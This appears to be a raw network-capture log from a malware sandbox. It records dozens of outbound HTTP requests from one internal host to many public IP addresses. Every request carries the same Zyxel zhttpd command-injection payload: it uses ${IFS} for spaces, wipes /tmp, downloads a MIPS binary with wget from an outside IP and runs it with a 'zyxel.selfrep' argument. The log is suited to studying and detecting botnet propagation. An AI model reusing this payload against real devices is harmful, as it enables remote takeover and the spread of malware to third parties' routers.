                                        Mar 31, 2024 09:20:32.243844986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        974192.168.2.2359060145.247.128.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243882895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        975192.168.2.235232890.130.177.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243931055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        976192.168.2.235353276.85.39.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244000912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        977192.168.2.235622046.234.210.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244033098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        978192.168.2.2337486195.38.210.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244064093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        979192.168.2.2359560157.191.25.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244133949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        980192.168.2.2347546136.197.86.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244193077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        981192.168.2.233707236.242.180.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244245052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        982192.168.2.2350726132.174.81.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244292974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        983192.168.2.2344064110.184.167.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244343042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        984192.168.2.233456885.148.153.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244391918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        985192.168.2.233290870.18.48.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244426012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        986192.168.2.2359582193.33.197.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244472980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        987192.168.2.234260488.72.193.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244530916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        988192.168.2.2356120171.154.247.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244570971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        989192.168.2.2341490189.84.218.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244641066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        990192.168.2.2337554104.69.80.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244668007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        991192.168.2.2341362111.76.105.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244704962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        992192.168.2.2337924218.154.35.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244765997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        993192.168.2.2342866186.81.51.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244817019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        994192.168.2.2350788146.224.67.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244863987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        995192.168.2.235487434.42.238.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244910955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        996192.168.2.2355522153.183.107.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.244959116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        997192.168.2.2349426201.27.63.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245011091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        998192.168.2.2350016191.252.121.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245048046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        999192.168.2.2339888219.165.104.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245083094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1000192.168.2.2334730112.105.57.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245140076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1001192.168.2.23339881.157.49.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245170116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1002192.168.2.2333362112.82.147.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245218039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1003192.168.2.2354318118.55.196.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245273113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1004192.168.2.2343220208.202.144.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245327950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1005192.168.2.2336194146.39.186.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245357990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1006192.168.2.235956279.41.93.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245402098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1007192.168.2.2353074137.70.111.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245440006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1008192.168.2.2358512188.3.118.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245481968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1009192.168.2.2337470110.65.69.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245539904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1010192.168.2.2339080207.68.70.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245579958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1011192.168.2.23479781.101.101.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245604038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1012192.168.2.2355742154.192.246.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245652914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1013192.168.2.2348990102.103.144.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245708942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1014192.168.2.235322018.208.157.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245745897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1015192.168.2.2349912179.1.81.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245789051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1016192.168.2.233910080.249.208.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245807886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1017192.168.2.2360084172.137.162.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245846033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1018192.168.2.2356666136.74.35.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245898008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1019192.168.2.2347388212.247.215.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245933056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1020192.168.2.2337182203.253.47.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.245965004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1021192.168.2.2347922109.53.4.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246010065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1022192.168.2.2337920198.166.228.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246048927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1023192.168.2.2351524154.191.122.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246104956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1024192.168.2.2345584122.187.239.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246144056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1025192.168.2.234035651.128.172.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246179104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1026192.168.2.234654471.98.58.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246221066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1027192.168.2.236010899.88.168.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246282101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1028192.168.2.2360888129.34.247.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246321917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1029192.168.2.235355634.216.171.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246360064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1030192.168.2.2341032134.133.60.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246422052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1031192.168.2.2351412104.33.47.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246467113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1032192.168.2.2348386209.221.199.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246512890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1033192.168.2.2337154182.255.166.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246568918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1034192.168.2.235220861.251.206.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246612072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1035192.168.2.2340352198.139.148.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246660948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1036192.168.2.2344864174.136.131.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246704102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1037192.168.2.2356474109.156.82.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246767044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1038192.168.2.2353444165.43.34.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246818066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1039192.168.2.2344690193.65.50.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246850967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1040192.168.2.233422884.85.51.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246911049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1041192.168.2.2340424131.191.44.68443
                                        TimestampBytes transferredDirectionData
